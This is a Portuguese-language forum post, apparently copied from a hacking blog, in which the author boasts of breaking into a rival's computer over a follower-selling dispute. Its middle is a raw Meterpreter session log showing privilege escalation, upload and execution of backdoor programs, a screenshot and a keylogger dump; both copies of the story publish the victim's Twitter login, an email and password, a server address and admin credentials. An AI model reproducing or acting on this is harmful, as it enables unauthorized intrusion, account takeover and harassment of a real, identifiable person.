Hey, esse post foi tirado do meu blog, feito especialmente pra comunidades da EBR e da Orkut Exploits do orkut, mas acho bom compartilhar aqui tamben.
Boa Leitura.
----------------------------------------------------------------------------------------------------------------------------------------------------------
A umas semanas o joseph veio me falar, no msn que tinha levado um calote, ele colocou milhares de seguidores pra um cara e ele não tinha pagado e por cima denuncio a conta dele do twitter ate ser deletada, ae ele me disse, eu como um bom amigo levei como se tive-se sido com migo. Quem vez isso? Nosso velho e bom paraiba DarK MisT.
Então entrei na briga, segue a exploracao:
Backdoorizei o computador dele com 3 backdoors, se voce tiver lendo isso, sorry so formatando agora LOL
Hum … achei o twitter dele … acho que o joseph que vai gostar disso:
DarKMisTBR
carro123
Ok ok ok, tamben temos uns acesso a uns servidores dele pelo que parece:
================================================== ======================
robertolek@live.com:carro123
212.124.113.76
admin
radiohits
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
well
cassolla159
================================================== ======================
Hum ….. que coisinha linda
Só nao postei o email pessoal dele com senha pois sou bomsinho.
Vamos deixar o orkut dele com ele por enquando, pra da pra ele vim aqui reclamar rs
HUm …. acho que só, a senha do tão querido twitter dele com 29 k de seguidores ta com joseph e só ele desside se recuperar ou não, recomendo que ele devolva se ele pedir descupa pela sacanagem que fez com ele, gravar tudo e posta aqui.
Agora pergunto pra voces, achão que exagerei?
Acho que por um amigo nunca é exagero, agora vou ir ri um pouco LOOOOOOOOOOOOOOOOL
Blog: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Boa Leitura.
----------------------------------------------------------------------------------------------------------------------------------------------------------
A umas semanas o joseph veio me falar, no msn que tinha levado um calote, ele colocou milhares de seguidores pra um cara e ele não tinha pagado e por cima denuncio a conta dele do twitter ate ser deletada, ae ele me disse, eu como um bom amigo levei como se tive-se sido com migo. Quem vez isso? Nosso velho e bom paraiba DarK MisT.
Então entrei na briga, segue a exploracao:
Código:
[*] Sending stage (752128 bytes) to 189.70.168.229[*] Meterpreter session 1 opened (192.168.0.103:53 -> 189.70.168.229:33725) at Fri Sep 30 12:07:02 -0300 2011 msf exploit(handler) > sessions -i 1[*] Starting interaction with 1... meterpreter > getpid Current pid: 768 meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 280 smss.exe x86 0 AUTORIDADE NT\SISTEMA \SystemRoot\System32\smss.exe 384 csrss.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\csrss.exe 436 wininit.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\wininit.exe 444 csrss.exe x86 1 AUTORIDADE NT\SISTEMA C:\Windows\system32\csrss.exe 500 winlogon.exe x86 1 AUTORIDADE NT\SISTEMA C:\Windows\system32\winlogon.exe 536 services.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\services.exe 552 lsass.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\lsass.exe 560 lsm.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\lsm.exe 664 svchost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\svchost.exe 752 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445 C:\Windows\system32\svchost.exe 828 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\System32\svchost.exe 880 svchost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\System32\svchost.exe 908 svchost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\svchost.exe 1052 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\svchost.exe 1168 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445 C:\Windows\system32\svchost.exe 1380 spoolsv.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\System32\spoolsv.exe 1416 sched.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\Avira\AntiVir Desktop\sched.exe 1436 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\svchost.exe 1572 taskhost.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Windows\system32\taskhost.exe 1636 dwm.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Windows\system32\Dwm.exe 1688 explorer.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Windows\Explorer.EXE 1788 WVSScheduler.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\Acunetix\Web Vulnerability Scanner 6\WVSScheduler.exe 2024 avguard.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\Avira\AntiVir Desktop\avguard.exe 448 RaRegistry.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\Ralink\Common\RaRegistry.exe 976 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\svchost.exe 1208 avshadow.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\Avira\AntiVir Desktop\avshadow.exe 1248 conhost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\conhost.exe 1544 TeamViewer_Service.exe x86 0 AUTORIDADE NT\SISTEMA C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe 972 avgnt.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Avira\AntiVir Desktop\avgnt.exe 1608 jusched.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Common Files\Java\Java Update\jusched.exe 1752 msnmsgr.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Windows Live\Messenger\msnmsgr.exe 952 IDMan.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Internet Download Manager\IDMan.exe 2068 ApUI.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Ralink\Common\ApUI.exe 2544 IEMonitor.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Internet Download Manager\IEMonitor.exe 2880 alg.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\System32\alg.exe 2908 SearchIndexer.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\SearchIndexer.exe 2972 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\svchost.exe 3080 WUDFHost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\WUDFHost.exe 3216 svchost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\System32\svchost.exe 3256 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445 C:\Windows\system32\svchost.exe 3408 wmpnetwk.exe x86 0 $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445 C:\Program Files\Windows Media Player\wmpnetwk.exe 2060 svchost.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\System32\svchost.exe 3628 wlcomm.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Windows Live\Contacts\wlcomm.exe 3732 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 1888 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 2840 rundll32.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Windows\system32\rundll32.exe 2352 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 2824 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 1564 msnmsgr.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Windows Live\Messenger\msnmsgr.exe 6084 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 5436 audiodg.exe x86 0 $U$AUTORIDADE NT\SERVIO LOCAL-0x4155544f524944414445204e545c5345525649c74f204c4f43414c C:\Windows\system32\AUDIODG.EXE 4672 wmplayer.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Windows Media Player\wmplayer.exe 4448 chrome.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\AppData\Local\Google\Chrome\Application\chrome.exe 840 Skype.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Program Files\Skype\Phone\Skype.exe 1520 taskhost.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Windows\system32\taskhost.exe 6040 SearchProtocolHost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\SearchProtocolHost.exe 768 sqli.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\windows\system32\sqli.exe 5860 MpCmdRun.exe x86 0 $U$AUTORIDADE NT\SERVIO DE REDE-0x4155544f524944414445204e545c5345525649c74f2044452052454445 c:\program files\windows defender\MpCmdRun.exe 4948 SearchFilterHost.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\SearchFilterHost.exe 5560 SQLInjection.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\Users\Tiago Augusto\Desktop\kl\SQL INJECTION 1.2\SQLInjection.exe 5468 SQLInjection2.exe x86 1 TiagoAugusto-PC\Tiago Augusto C:\windows\system32\SQLInjection2.exe 5584 taskeng.exe x86 0 AUTORIDADE NT\SISTEMA C:\Windows\system32\taskeng.exe meterpreter > migrate 1688[*] Migrating to 1688...[*] Migration completed successfully. meterpreter > getuid Server username: TiagoAugusto-PC\Tiago Augusto meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeDebugPrivilege SeIncreaseQuotaPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeManageVolumePrivilege meterpreter > getsystem ...got system (via technique 1). meterpreter > pwd C:\windows\temp meterpreter > upload server.exe[*] uploading : server.exe -> server.exe[*] uploaded : server.exe -> server.exe meterpreter > shell Process 5064 created. Channel 2 created. Microsoft Windows [versÆo 6.1.7600] Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados. C:\Windows\system32>cd .. cd .. C:\Windows>cd temp cd temp C:\Windows\Temp>dir dir O volume na unidade C nÆo tem nome. O N£mero de Srie do Volume 08DE-5B69 Pasta de C:\Windows\Temp 30/09/2011 12:11 . 30/09/2011 12:11 .. 27/09/2011 17:44 AVSETUP_4e823599 10/08/2011 22:06 BdeSqm 21/09/2011 22:01 660 coinlog.log 30/09/2011 12:07 57.054 MpCmdRun.log 27/09/2011 17:48 11.346 MpSigStub.log 07/09/2011 16:03 992 MSI8e45d.LOG 02/08/2011 21:58 992 MSIe3e4e.LOG 30/09/2011 12:11 380.166 server.exe 6 arquivo(s) 451.210 bytes 4 pasta(s) 122.101.477.376 bytes dispon¡veis C:\Windows\Temp>server.exe server.exe C:\Windows\Temp>exit meterpreter > screenshot Screenshot saved to: /root/NRNRHjXv.jpeg meterpreter > upload upload .DCOPserver_bt_:0 upload .gconfd upload .nano_history upload .DCOPserver_bt__0 upload .gem upload .profile upload .ICEauthority upload .gentoorc upload .qt upload .Xauthority upload .gnome2 upload .ssh upload .adobe upload .gnome2_private upload .subversion upload .aptitude upload .gtk_qt_engine_rc upload .thumbnails upload .bash_history upload .gtkrc-2.0 upload .wine upload .bashrc upload .java upload .wireshark upload .config upload .kde upload .xchat2 upload .conky_scripts upload .kde3 upload .xcompmgrrc upload .conkyrc upload .liferea_1.4 upload .xinitrc upload .dbus upload .local upload NRNRHjXv.jpeg upload .debtags upload .macromedia upload autopython upload .directory upload .mcop upload scvr.exe upload .dragon upload .mozilla upload server.exe upload .esd_auth upload .msf3 upload sqli.exe upload .fluxbox upload .msf4 upload teste upload .gconf upload .mysql_history upload tudo meterpreter > upload scvr.exe[*] uploading : scvr.exe -> scvr.exe[*] uploaded : scvr.exe -> scvr.exe meterpreter > shell Process 3988 created. Channel 4 created. Microsoft Windows [versÆo 6.1.7600] Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados. C:\Windows\system32>cd .. cd .. C:\Windows>cd temp cd temp C:\Windows\Temp>dir dir O volume na unidade C nÆo tem nome. O N£mero de Srie do Volume 08DE-5B69 Pasta de C:\Windows\Temp 30/09/2011 12:13 . 30/09/2011 12:13 .. 27/09/2011 17:44 AVSETUP_4e823599 10/08/2011 22:06 BdeSqm 21/09/2011 22:01 660 coinlog.log 30/09/2011 12:07 57.054 MpCmdRun.log 27/09/2011 17:48 11.346 MpSigStub.log 07/09/2011 16:03 992 MSI8e45d.LOG 02/08/2011 21:58 992 MSIe3e4e.LOG 30/09/2011 12:13 442.922 scvr.exe 6 arquivo(s) 513.966 bytes 4 pasta(s) 122.099.466.240 bytes dispon¡veis C:\Windows\Temp>scvr.exe scvr.exe C:\Windows\Temp>exit meterpreter > ipconfig Software Loopback Interface 1 Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 NIC Fast Ethernet PCI-E Realtek Família RTL8101E (NDIS 6.20) Hardware MAC: 00:21:85:90:e0:3d IP Address : 192.168.1.64 Netmask : 255.255.255.0 meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... IRC [e pra cc kk Room Unix meterpreter > background msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 TiagoAugusto-PC\Tiago Augusto @ TIAGOAUGUSTO-PC 192.168.0.103:53 -> 189.70.168.229:33725 msf exploit(handler) >
Hum … achei o twitter dele … acho que o joseph que vai gostar disso:
DarKMisTBR
carro123
Ok ok ok, tamben temos uns acesso a uns servidores dele pelo que parece:
================================================== ======================
robertolek@live.com:carro123
212.124.113.76
admin
radiohits
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
well
cassolla159
================================================== ======================
Hum ….. que coisinha linda
Só nao postei o email pessoal dele com senha pois sou bomsinho.
Vamos deixar o orkut dele com ele por enquando, pra da pra ele vim aqui reclamar rs
HUm …. acho que só, a senha do tão querido twitter dele com 29 k de seguidores ta com joseph e só ele desside se recuperar ou não, recomendo que ele devolva se ele pedir descupa pela sacanagem que fez com ele, gravar tudo e posta aqui.
Agora pergunto pra voces, achão que exagerei?
Acho que por um amigo nunca é exagero, agora vou ir ri um pouco LOOOOOOOOOOOOOOOOL
Blog: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment